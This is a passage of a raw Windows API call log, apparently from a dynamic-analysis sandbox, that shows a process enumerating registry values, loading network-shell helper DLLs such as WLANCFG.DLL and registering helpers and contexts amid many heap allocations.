RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe18) returned 0x31b3f0 [0210.235] GetProcessHeap () returned 0x2c0000 [0210.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312620 | out: hHeap=0x2c0000) returned 1 [0210.235] RegisterHelper () returned 0x0 [0210.235] GetProcessHeap () returned 0x2c0000 [0210.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe70) returned 0x31c210 [0210.236] GetProcessHeap () returned 0x2c0000 [0210.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0210.236] RegisterHelper () returned 0x0 [0210.236] GetProcessHeap () returned 0x2c0000 [0210.236] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0xec8) returned 0x31d090 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c210 | out: hHeap=0x2c0000) returned 1 [0210.237] RegisterHelper () returned 0x0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf20) returned 0x31b3f0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d090 | out: hHeap=0x2c0000) returned 1 [0210.237] RegisterHelper () returned 0x0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf78) returned 0x31c320 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0210.237] RegisterHelper () returned 0x0 [0210.237] GetProcessHeap () returned 0x2c0000 [0210.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfd0) returned 0x31d2a0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c320 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1028) returned 0x31b3f0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d2a0 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1080) returned 0x31c420 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, 
Flags=0x0, Size=0x10d8) returned 0x31d4b0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c420 | out: hHeap=0x2c0000) returned 1 [0210.238] RegisterHelper () returned 0x0 [0210.238] GetProcessHeap () returned 0x2c0000 [0210.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1130) returned 0x31b3f0 [0210.239] GetProcessHeap () returned 0x2c0000 [0210.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d4b0 | out: hHeap=0x2c0000) returned 1 [0210.239] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="wwancfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0210.239] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0210.239] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0210.239] GetProcessHeap () returned 0x2c0000 [0210.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x320) returned 0x3104a0 [0210.246] GetProcessHeap () returned 0x2c0000 [0210.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2fe720 [0210.246] GetProcessHeap () returned 0x2c0000 [0210.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2fe700 [0210.246] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0210.246] GetProcessHeap () returned 0x2c0000 [0210.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307460 | out: hHeap=0x2c0000) returned 1 [0210.246] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef4c40000 [0213.844] GetProcAddress (hModule=0x7fef4c40000, lpProcName="InitHelperDll") returned 0x7fef4c420c8 [0213.844] InitHelperDll () returned 0x0 [0213.844] RegisterHelper () returned 0x0 [0213.844] GetProcessHeap () returned 0x2c0000 [0213.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 
Size=0x1188) returned 0x31c530 [0213.844] GetProcessHeap () returned 0x2c0000 [0213.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b3f0 | out: hHeap=0x2c0000) returned 1 [0213.844] RegEnumValueW (in: hKey=0x90, dwIndex=0x13, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="wlancfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0213.845] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0213.845] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x348) returned 0x310be0 [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x30b010 [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x30b050 [0213.845] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0213.845] GetProcessHeap () returned 0x2c0000 [0213.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3104a0 | out: hHeap=0x2c0000) returned 1 [0213.845] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef4a00000 [0217.440] GetProcAddress (hModule=0x7fef4a00000, lpProcName="InitHelperDll") returned 0x7fef4a0613c [0217.440] InitHelperDll () returned 0x0 [0217.440] RegisterHelper () returned 0x0 [0217.440] GetProcessHeap () returned 0x2c0000 [0217.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11e0) returned 0x31d6c0 [0217.441] GetProcessHeap () returned 0x2c0000 [0217.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c530 | out: hHeap=0x2c0000) returned 1 [0217.441] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | 
out: lpValueName="peerdistsh", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0217.441] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0217.441] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0217.441] GetProcessHeap () returned 0x2c0000 [0217.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x370) returned 0x31e8b0 [0217.441] GetProcessHeap () returned 0x2c0000 [0217.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 0x30b070 [0217.442] GetProcessHeap () returned 0x2c0000 [0217.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e) returned 0x315d80 [0217.442] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0217.442] GetProcessHeap () returned 0x2c0000 [0217.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x310be0 | out: hHeap=0x2c0000) returned 1 [0217.442] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef3070000 [0219.546] GetProcAddress (hModule=0x7fef3070000, lpProcName="InitHelperDll") returned 0x7fef30ee69c [0219.556] InitHelperDll () returned 0x0 [0219.613] RegisterHelper () returned 0x0 [0219.613] GetProcessHeap () returned 0x2c0000 [0219.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1238) returned 0x31c3f0 [0219.613] GetProcessHeap () returned 0x2c0000 [0219.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31d6c0 | out: hHeap=0x2c0000) returned 1 [0219.613] RegisterHelper () returned 0x0 [0219.613] GetProcessHeap () returned 0x2c0000 [0219.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1290) returned 0x31ec30 [0219.614] GetProcessHeap () returned 0x2c0000 [0219.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31c3f0 | out: hHeap=0x2c0000) returned 1 [0219.614] RegCloseKey (hKey=0x90) returned 0x0 [0219.614] GetProcessHeap () returned 0x2c0000 [0219.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2340 | 
out: hHeap=0x2c0000) returned 1 [0219.614] GetProcessHeap () returned 0x2c0000 [0219.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de090 | out: hHeap=0x2c0000) returned 1 [0219.616] GetProcessHeap () returned 0x2c0000 [0219.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec030 [0219.616] GetProcessHeap () returned 0x2c0000 [0219.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.617] RegisterContext () returned 0x0 [0219.619] GetProcessHeap () returned 0x2c0000 [0219.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0219.619] GetProcessHeap () returned 0x2c0000 [0219.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.660] RegisterContext () returned 0x0 [0219.661] GetProcessHeap () returned 0x2c0000 [0219.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec130 [0219.661] GetProcessHeap () returned 0x2c0000 [0219.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.662] RegisterContext () returned 0x0 [0219.662] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0219.662] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0219.662] GetProcessHeap () returned 0x2c0000 [0219.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.663] GetProcessHeap () returned 0x2c0000 [0219.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec130 | out: hHeap=0x2c0000) returned 1 [0219.664] RegisterContext () returned 0x0 [0219.665] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0219.665] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0219.665] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0219.665] GetProcessHeap () returned 0x2c0000 [0219.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.666] GetProcessHeap () returned 0x2c0000 
[0219.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0219.666] RegisterContext () returned 0x0 [0219.667] GetProcessHeap () returned 0x2c0000 [0219.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x312a70 [0219.667] GetProcessHeap () returned 0x2c0000 [0219.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0219.668] RegisterContext () returned 0x0 [0219.668] GetProcessHeap () returned 0x2c0000 [0219.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.668] GetProcessHeap () returned 0x2c0000 [0219.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0219.669] RegisterContext () returned 0x0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0219.669] RegisterContext () returned 0x0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x312ec0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0219.669] RegisterContext () returned 0x0 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x230) returned 0x313090 [0219.669] GetProcessHeap () returned 0x2c0000 [0219.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0219.802] RegisterContext () returned 0x0 [0219.802] GetProcessHeap () returned 0x2c0000 [0219.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a0) returned 0x325b60 [0219.802] GetProcessHeap () returned 0x2c0000 [0219.802] HeapFree 
(in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313090 | out: hHeap=0x2c0000) returned 1 [0219.803] RegisterContext () returned 0x0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x312ec0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0219.803] RegisterContext () returned 0x0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.803] RegisterContext () returned 0x0 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.803] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0219.804] RegisterContext () returned 0x0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0219.804] RegisterContext () returned 0x0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x3131e0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0219.804] RegisterContext () returned 0x0 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x380) returned 0x325b60 [0219.804] GetProcessHeap () returned 0x2c0000 [0219.804] HeapFree (in: hHeap=0x2c0000, 
dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0219.805] RegisterContext () returned 0x0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3f0) returned 0x325ef0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0219.805] RegisterContext () returned 0x0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x460) returned 0x3262f0 [0219.805] GetProcessHeap () returned 0x2c0000 [0219.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325ef0 | out: hHeap=0x2c0000) returned 1 [0219.805] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4d0) returned 0x325b60 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3262f0 | out: hHeap=0x2c0000) returned 1 [0219.806] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0219.806] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0219.806] RegisterContext () returned 0x0 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x311060 [0219.806] GetProcessHeap () returned 0x2c0000 [0219.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 
lpMem=0x309730 | out: hHeap=0x2c0000) returned 1 [0220.583] RegisterContext () returned 0x0 [0220.583] GetProcessHeap () returned 0x2c0000 [0220.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x312ec0 [0220.583] GetProcessHeap () returned 0x2c0000 [0220.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x311060 | out: hHeap=0x2c0000) returned 1 [0220.583] RegisterContext () returned 0x0 [0220.583] GetProcessHeap () returned 0x2c0000 [0220.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x230) returned 0x326040 [0220.584] GetProcessHeap () returned 0x2c0000 [0220.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0220.700] RegisterContext () returned 0x0 [0220.700] GetProcessHeap () returned 0x2c0000 [0220.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a0) returned 0x312ec0 [0220.700] GetProcessHeap () returned 0x2c0000 [0220.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326040 | out: hHeap=0x2c0000) returned 1 [0220.701] RegisterContext () returned 0x0 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0220.701] RegisterContext () returned 0x0 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0220.701] RegisterContext () returned 0x0 [0220.701] RegisterContext () returned 0x0 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x326040 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] HeapFree (in: 
hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0220.702] RegisterContext () returned 0x0 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x380) returned 0x326360 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326040 | out: hHeap=0x2c0000) returned 1 [0220.702] RegisterContext () returned 0x0 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x540) returned 0x3266f0 [0220.703] GetProcessHeap () returned 0x2c0000 [0220.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0220.703] RegisterContext () returned 0x0 [0220.703] GetProcessHeap () returned 0x2c0000 [0220.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5b0) returned 0x325b60 [0220.703] GetProcessHeap () returned 0x2c0000 [0220.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3266f0 | out: hHeap=0x2c0000) returned 1 [0220.725] RegisterContext () returned 0x0 [0220.725] GetProcessHeap () returned 0x2c0000 [0220.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x620) returned 0x3266f0 [0220.725] GetProcessHeap () returned 0x2c0000 [0220.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0220.726] RegisterContext () returned 0x0 [0220.726] GetProcessHeap () returned 0x2c0000 [0220.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0220.726] GetProcessHeap () returned 0x2c0000 [0220.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0220.726] RegisterContext () returned 0x0 [0220.726] GetProcessHeap () returned 0x2c0000 [0220.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x690) returned 0x325b60 [0220.727] GetProcessHeap () returned 0x2c0000 [0220.727] HeapFree (in: hHeap=0x2c0000, 
dwFlags=0x0, lpMem=0x3266f0 | out: hHeap=0x2c0000) returned 1 [0220.971] RegisterContext () returned 0x0 [0220.972] GetProcessHeap () returned 0x2c0000 [0220.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x700) returned 0x330890 [0220.972] GetProcessHeap () returned 0x2c0000 [0220.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0221.654] RegisterContext () returned 0x0 [0221.654] GetProcessHeap () returned 0x2c0000 [0221.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0221.654] GetProcessHeap () returned 0x2c0000 [0221.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0221.664] RegisterContext () returned 0x0 [0221.664] GetProcessHeap () returned 0x2c0000 [0221.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309cd0 [0221.664] GetProcessHeap () returned 0x2c0000 [0221.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | out: hHeap=0x2c0000) returned 1 [0221.665] RegisterContext () returned 0x0 [0221.665] GetProcessHeap () returned 0x2c0000 [0221.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x770) returned 0x346b80 [0221.666] GetProcessHeap () returned 0x2c0000 [0221.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330890 | out: hHeap=0x2c0000) returned 1 [0221.666] RegisterContext () returned 0x0 [0221.666] GetProcessHeap () returned 0x2c0000 [0221.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0221.667] GetProcessHeap () returned 0x2c0000 [0221.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0221.667] RegisterContext () returned 0x0 [0221.667] GetProcessHeap () returned 0x2c0000 [0221.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309dc0 [0221.667] GetProcessHeap () returned 0x2c0000 [0221.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | 
out: hHeap=0x2c0000) returned 1 [0221.667] RegisterContext () returned 0x0 [0221.667] RegisterContext () returned 0x0 [0221.668] RegisterContext () returned 0x0 [0221.668] GetProcessHeap () returned 0x2c0000 [0221.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7e0) returned 0x347300 [0221.668] GetProcessHeap () returned 0x2c0000 [0221.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b80 | out: hHeap=0x2c0000) returned 1 [0222.024] RegisterContext () returned 0x0 [0222.024] GetProcessHeap () returned 0x2c0000 [0222.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x347f10 [0222.025] GetProcessHeap () returned 0x2c0000 [0222.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347300 | out: hHeap=0x2c0000) returned 1 [0222.025] RegisterContext () returned 0x0 [0222.025] GetProcessHeap () returned 0x2c0000 [0222.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x346da0 [0222.026] GetProcessHeap () returned 0x2c0000 [0222.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347f10 | out: hHeap=0x2c0000) returned 1 [0222.026] RegisterContext () returned 0x0 [0222.026] GetProcessHeap () returned 0x2c0000 [0222.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0222.026] GetProcessHeap () returned 0x2c0000 [0222.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0222.909] RegisterContext () returned 0x0 [0222.909] GetProcessHeap () returned 0x2c0000 [0222.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x347f40 [0223.035] GetProcessHeap () returned 0x2c0000 [0223.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | out: hHeap=0x2c0000) returned 1 [0223.035] RegisterContext () returned 0x0 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x347670 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] 
HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347f40 | out: hHeap=0x2c0000) returned 1 [0223.036] RegisterContext () returned 0x0 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x3477d0 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347670 | out: hHeap=0x2c0000) returned 1 [0223.036] RegisterContext () returned 0x0 [0223.037] GetProcessHeap () returned 0x2c0000 [0223.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0223.037] GetProcessHeap () returned 0x2c0000 [0223.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0223.038] RegisterContext () returned 0x0 [0223.038] GetProcessHeap () returned 